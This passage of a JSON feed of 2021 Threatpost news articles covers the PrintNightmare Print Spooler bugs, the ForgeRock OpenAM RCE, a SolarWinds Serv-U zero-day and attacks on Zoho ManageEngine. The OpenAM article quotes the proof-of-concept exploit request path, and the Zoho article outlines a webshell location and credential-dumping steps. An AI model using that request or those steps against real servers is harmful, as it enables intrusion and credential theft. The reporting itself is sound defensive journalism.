It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.\n\nIndeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, \u201cthe attack is not really related to PrintNightmare.\u201d Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.\n\nThe entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after, it became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. 
The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted \u2014 advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.\n\nEventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that included all previous patches, protections for CVE-2021-1675 and a new fix for CVE-2021-34527.\n\nHowever, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. 
In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T11:57:53", "type": "threatpost", "title": "Microsoft: Unpatched Bug in Windows Print Spooler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-16T11:57:53", "id": "THREATPOST:A8242348917526090B7A1B23735D5C6C", "href": "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infrastructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. 
CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after, it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called 
\u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\u201d\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n\u201cWe are still investigating whether all versions are exploitable,\u201d the company wrote. 
\u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": 
"THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T19:49:18", "description": "One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).\n\nThe news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim\u2019s network as part of a recent ransomware attack.\n\n\u201cIn technology, almost nothing ages gracefully,\u201d Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. \u201cThe Print Spooler in Windows is proving that rule. It\u2019s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. 
I\u2019ve heard it said that ransomware gangs might also be referred to as \u2018technical debt collectors,\u2019 which would be funnier if the people suffering most from these vulnerabilities weren\u2019t Microsoft\u2019s customers.\u201d\n\nThe fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it\u2019s rated as \u201cimportant.\u201d Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.\n\n\u201cA remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\nThe CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.\n\n
On Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the \u201cPoint and Print\u201d capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.\n\nWhile Microsoft requires that printers installable via Point and Print are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.\n\n\u201cFor example, a shared printer can specify a CopyFiles directive for arbitrary files,\u201d according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). \u201cThese files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.\u201d\n\nMicrosoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:\n\n> Hey guys, I reported the vulnerability in Dec\u201920 but haven\u2019t disclosed details at MSRC\u2019s request. 
It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nSo far, Microsoft hasn\u2019t seen any attacks in the wild using the bug, but it noted that exploitation is \u201cmore likely.\u201d With a working exploit in circulation, that seems a fair assessment.\n\n## **Print Spooler-Palooza and the PrintNightmare**\n\nDelpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.\n\nThe bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it\u2019s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number \u2013 in this case, CVE-2021-34527 \u2013 to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nBoth bugs \u2013 which are really just variants of a single issue \u2013 are collectively known as PrintNightmare. 
The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service:\n\n\n\nSource: Microsoft.\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. \u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. 
**[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T13:19:50", "type": "threatpost", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T13:19:50", "id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-13T12:53:34", "description": "Attackers are actively exploiting a critical, pre-authorization remote-code execution (RCE) vulnerability in the popular Access Management platform from digital identity management firm ForgeRock.\n\nAccess Management, a commercial access-management platform, is based on the [OpenAM](<https://github.com/OpenIdentityPlatform/OpenAM>) open-source access-management platform for web applications. The platform front-ends web apps and remote-access setups in many enterprises.\n\nOn Monday morning, the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>) that the vulnerability could enable attackers to execute commands in the context of the current user. The flaw can be found in Access Management versions below 7.0 running on Java 8. That means 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3, as well as older, unsupported versions are all sitting ducks.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAlso on Monday, ForgeRock said in an updated [security advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) that the flaw doesn\u2019t affect Access Management 7 and above. It only impacts a subset of ForgeRock customers who are using older versions of the company\u2019s Access Management product.\n\nAn exploit for the critical vulnerability at the heart of the matter \u2013 [CVE-2021-35464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464>) \u2013 was [first reported](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>) by Michael Stepankin, a researcher for the cybersecurity firm PortSwigger, on June 29. 
In his report, Stepankin explained that he created a new [Ysoserial deserialization gadget chain](<https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Click1.java>) specifically for the exploit.\n\nAs [GitHub details](<https://github.com/frohoff/ysoserial>), Ysoserial is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. Serialization is a mechanism of converting the state of an object into a byte stream, which is used to persist the object. Deserialization, in turn, is the reverse process: the mechanism whereby the byte stream is used to recreate the actual Java object in memory.\n\nWithin hours of Stepankin\u2019s post on June 29, ForgeRock released a workaround and advisory to its customers to protect them from the vulnerability. On July 9, the company updated its advisory with a permanent fix.\n\n## What a Dinky PoC\n\nIn his post, Stepankin summed up the flaw as an RCE made possible \u201cthanks to unsafe Java deserialization in the Jato framework used by OpenAM.\u201d The proof of concept (PoC) requires this single GET/POST request for code execution:\n\n> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n\nHe said that an attacker who crafts such a request can send it to an exposed, remote endpoint in order to pull off RCE.\n\nThe researcher discovered the vulnerability while looking into [OAuth vulnerabilities](<https://threatpost.com/microsoft-warns-oauth-attacks-cloud-app/157331/>). OAuth is an open standard for access delegation, commonly used as a way for people to sign into services without entering a password, by using signed-in status on another, trusted service or website. Examples include the \u201cSign in with Google\u201d or \u201cSign in with Facebook\u201d that many websites use in lieu of asking visitors to create a new account. 
These \u201cSign in\u201d or \u201cLog in\u201d prompts are called consent prompts.\n\nA year ago, [Microsoft warned](<https://threatpost.com/microsoft-warns-oauth-attacks-cloud-app/157331/>) that during the pandemic, against the backdrop of widespread remote working and the increased use of collaboration apps, attackers were ramping up application-based attacks that exploit OAuth 2.0.\n\nWith the help of a few scripts, Stepankin discovered all servers that respond to the \u201c/well-known/openid-configuration\u201d URI and checked out their configuration. He decided to focus on \u201ctruly impactful\u201d vulnerabilities: Hence, he zeroed in on systems that are either open-source or available to download and decompile. \u201cForgeRock OpenAm was one such system that I found in the bug bounty scope,\u201d he wrote. \u201cIt appeared to me as a monstrous Java Enterprise application with a huge attack surface, so I decided to take a deeper look into it.\u201d\n\nHis takeaways from tackling the Java monster:\n\n * Source code analysis and local testing are essential for finding issues like this one.\n * URLDNS and JRMPClient gadget chains are the most universal for testing deserialization in Java.\n * Even in solutions designed for authentication, you can find a big attack surface available without any auth.\n * Automatic source code analysis tools are not sufficient if they don\u2019t cover dependencies.\n * Java deserialization rocks.\n\n## Patch Available\n\nOn Saturday, ForgeRock [updated its advisory](<https://www.forgerock.com/blog/patch-fixing-am-vulnerability-now-available-forgerock-am-6x>) to advise users to take immediate action to either implement one of the workarounds or the patch as soon as possible.\n\nForgeRock urged users to apply a workaround, to be applied \u201cimmediately\u201d to secure deployments, noting that the workarounds are suitable for all versions, including older, unsupported ones.\n\nStepankin noted that the vulnerability was patched 
in ForgeRock AM version 7.0 \u201cby entirely removing the \u2018/ccversion\u2019 endpoint, along with other legacy endpoints that use Jato.\u201d\n\nHe mentioned this big \u201cbut\u201d: \u201cJato framework has not been updated for many years, so all other products that rely on it may still be affected.\u201d\n\nThe researcher also noted that the flaw doesn\u2019t affect instances running with Java version 9 or newer, \u201csince Jato requires classes that have been removed in Java 9. It\u2019s [one of the reasons](<https://backstage.forgerock.com/knowledge/kb/article/a53786484>) why ForgeRock AM versions prior to 7, such as 6.5, are still running on Java 8,\u201d he continued.\n\n## Patch or Workaround\n\nUsers who can\u2019t patch can apply one of two [workarounds](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) that ForgeRock provided in its advisory.\n\nCISA recommends these steps for Access Management users to secure their platforms against the active, ongoing exploits:\n\n * Review the [ForgeRock Security Advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) and the [Australian Cyber Security Centre Alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>);\n * Check for vulnerable instances of the Access Management software (see [ForgeRock\u2019s Technical Impact Assessment](<https://backstage.forgerock.com/cloud-storage-ws/api/v1/cloudstorage/getfile/oEQfKvz8SWSCaq8F2bfwhw>)); and\n * Prioritize deploying an update to Access Management version 7 or apply the workaround urgently.\n\n## Tasty Targets\n\nMarcus Hartwig, manager of security analytics at cybersecurity firm Vectra, told Threatpost on Monday that identity and access management (IAM) platforms like OpenAM are \u201calways ripe targets for attackers since they allow attackers to access multiple downstream applications federated with the solution.\u201d\n\nAs well, Hartwig said in an email, \u201ceven if the 
compromised account lacks access to a specific application, many IAM solutions support creating new downstream accounts on applications through protocols like SCIM, which further allows attackers to progress their attacks.\u201d\n\nHe said that it\u2019s \u201cparamount\u201d for organizations that leverage IAM solutions for SSO into downstream applications to \u201cmonitor account behavior in their environs to detect attacks that circumvent the preventative security that Access Management solutions focus on.\u201d\n\n071221 16:19 UPDATE: Corrected the article to specify that there\u2019s a patch available. We regret the error.\n\n071221 20:21 UPDATE: Corrected inaccurate timeline for patch release.\n", "cvss3": {}, "published": "2021-07-12T18:01:46", "type": "threatpost", "title": "Critical RCE Vulnerability in ForgeRock OpenAM Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-12T18:01:46", "id": "THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F", "href": "https://threatpost.com/critical-vulnerability-rce-forgerock-openam/167679/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-13T13:05:06", "description": "SolarWinds has issued a hotfix for a zero-day remote code execution (RCE) vulnerability already under active, yet limited, attack on some of the company\u2019s customers.\n\nMicrosoft alerted the company about the flaw, which affects its [Serv-U Managed File Transfer Server](<https://www.solarwinds.com/serv-u-managed-file-transfer-server>) and [Serv-U Secured FTP](<https://www.solarwinds.com/ftp-server-software>) products. 
Specifically, the vulnerability exists in the latest Serv-U version 15.2.3 HF1 released on May 5 of this year, as well as all prior versions, the company said in a [security advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) posted over the weekend.\n\nMicrosoft provided a proof-of-concept (PoC) exploit to SolarWinds, demonstrating how a threat actor who successfully exploits the vulnerability could run arbitrary code with privileges, according to the advisory.\n\n\u201cAn attacker could then install programs; view, change or delete data; or run programs on the affected system,\u201d the computing giant said.\n\nThough the current threat appears to be from a sole actor and \u201cinvolves a limited, targeted set of customers,\u201d SolarWinds wanted to remedy the situation before it could escalate, the company said. \u201cOur joint teams have mobilized to address it quickly,\u201d according to the advisory.\n\nSolarWinds does not currently know how many customers may be directly affected by the flaw, nor has it identified the ones who were targeted. The company is recommending that all customers using the affected products update now, which can be done by accessing the company\u2019s [customer portal](<https://customerportal.solarwinds.com/>).\n\n## Unrelated to Supply-Chain Attack\n\nIndeed, SolarWinds likely still has fresh memories of a [global supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) targeting the company\u2019s technology that was discovered late last year and stretched well into 2021. 
That attack occurred when [a state-sponsored APT](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) injected malicious code into normal software updates for SolarWinds Orion network-management platform.\n\nSpecifically, attackers installed the Sunburst/Solorigate backdoor inside SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of Orion. From there, the threat actors mounted a [massive cyberespionage campaign](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that hit nine U.S. government agencies, Microsoft and other tech companies, as well as about 100 other victims.\n\nSolarWinds stressed in its advisory that the latest vulnerability is not related to that [previous scenario](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) \u2014 which [cost the company $3.5 million](<https://d18rn0p25nwr6d.cloudfront.net/CIK-0001739942/48bd02f7-3c52-4abc-a5e9-60401f9a4e8b.pdf>) in investigation and remediation expenses \u2014 in any way.\n\n\u201cAll other SolarWinds and N-able (formerly SolarWinds MSP) are not affected by this vulnerability,\u201d the company wrote. 
\u201cThis includes the Orion Platform, and all Orion Platform modules.\u201d\n\nIn fact, the company even included a complete list of products \u201cnot known to be affected by this security vulnerability\u201d in the advisory for good measure, perhaps to stave off any potential panic or doubt that news of the latest vulnerability might inspire.\n\nIndeed, one security expert took to Twitter to advise organizations to keep a cool head over the news and take preemptive measures rather than raise an immediate alarm.\n\n\u201cI know there\u2019s a tendency to panic because it\u2019s SolarWinds \u2026 but I\u2019d suggest avoiding panic and taking proactive actions for defense and response instead,\u201d [tweeted](<https://twitter.com/likethecoins/status/1414681417053835265>) Katie Nickels, director of intel at security operations firm Red Canary.\n", "cvss3": {}, "published": "2021-07-13T12:58:11", "type": "threatpost", "title": "SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:58:11", "id": "THREATPOST:529C328386588625C56031DEF4AB5D63", "href": "https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T21:32:23", "description": "The FBI, CISA and the U.S. 
Coast Guard Cyber Command (CGCYBER) warned today that state-backed advanced persistent threat (APT) actors are likely among those who\u2019ve been actively exploiting a newly identified bug in a Zoho single sign-on and password management tool since early last month.\n\nAt issue is a critical authentication bypass vulnerability in the Zoho ManageEngine ADSelfService Plus platform that can lead to remote code execution (RCE) and thus open the corporate doors to attackers who can run amok, with free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nZoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nLast Tuesday, [Zoho issued a patch](<http://cve-2021-40539>) \u2013 [Zoho ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) \u2013 for the flaw, which is tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) with a 9.8 severity rating. 
As the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) at the time, it was being actively exploited in the wild as a zero-day.\n\nAccording to today\u2019s [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) from the three government cybersecurity arms \u2013 FBI, CISA and CGCYBER \u2013 the exploits pose \u201ca serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\u201d\n\nYou can see why: Successful exploitation of a lynchpin piece of security like an SSO and password handler could lay out a welcome mat for adversaries. Specifically, as the advisory noted, an adversary could use the vulnerability to pry open security defenses in order to compromise admin credentials, move laterally through the network, and exfiltrate registry hives and AD files.\n\nThat\u2019s of concern to any business, but with Zoho, we\u2019re talking about a security solution that\u2019s used by critical infrastructure companies, U.S.-cleared defense contractors and academic institutions, among others.\n\nThe joint advisory said that APT groups have in fact targeted such entities in multiple industries, including transportation, IT, manufacturing, communications, logistics and finance.\n\n\u201cIllicitly obtained access and information may disrupt company operations and subvert U.S. research in multiple sectors,\u201d the advisory noted. 
\u201cSuccessful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\u201d\n\n## Confirming Exploits May Be Tough\n\nSuccessful attacks have been uploading a .zip file containing a JavaServer Pages (JSP) webshell \u2013 accessible at /help/admin-guide/Reports/ReportGenerate.jsp \u2013 pretending to be an x509 certificate, service.cer. Next come requests to different API endpoints to further exploit the targeted system.\n\nThe next step in the exploit is lateral movement using Windows Management Instrumentation (WMI), gaining access to a domain controller, dumping NTDS.dit and the SECURITY/SYSTEM registry hives, and then, from there, further compromised access.\n\n\u201cConfirming a successful compromise of ManageEngine ADSelfService Plus may be difficult,\u201d the security agencies advised, given that the attackers are running clean-up scripts designed to rub out their tracks by removing traces of the initial point of compromise and by obscuring any relationship between the exploitation of CVE-2021-40539 and the 